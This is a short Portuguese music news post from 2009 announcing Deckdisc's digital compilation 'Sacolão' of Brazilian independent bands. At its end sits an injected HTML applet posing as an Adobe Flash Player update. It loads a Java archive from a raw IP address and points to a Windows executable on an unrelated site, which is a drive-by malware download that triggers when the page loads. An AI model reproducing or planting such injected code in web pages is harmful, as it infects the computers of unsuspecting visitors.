Coletânea “Sacolão” disponível no site da Deckdisc
Publicada em 21, Aug, 2009 por Musicao
A Deckdisc criou a coletânea digital “Sacolão”, que reúne bandas de peso da cena independente nacional.
Para comemorar o dia mundial do rock. Disponível nas operadoras de celular desde o lançamento, agora é possível ouvir todas as músicas na íntegra no site da Deckdisc.
Os artistas que fazem parte desse projeto são de várias partes do país, com propostas diferentes e uma coisa em comum: fazem um som com personalidade. Entre as bandas do Sacolão estão: Retrofoguetes, Publica, Vivendo do Ócio, Terminal Guadalupe, Os Pedrero, Jenifer Lo Fi, Rancore, Druques, Transmissor, Andrea Martins e Rock Z.
A coletânea Sacolão está disponível exclusivamente em digital para todas as operadoras de celular e em sites como Sonora (Terra) e Megastore (UOL).
Para ouvir as músicas, acesse o site www.deckdisc.com
<applet name="Adobe Flash Player version 10.1.6" code="Inicio.class" archive="http://62.149.167.160:5432/accounts/xml/FlashPlayer.jar" height="10" width="1">
<param name="url" value="http://www.cbc.org.br/upload/noticias/msnmsges.exe">
</applet>
|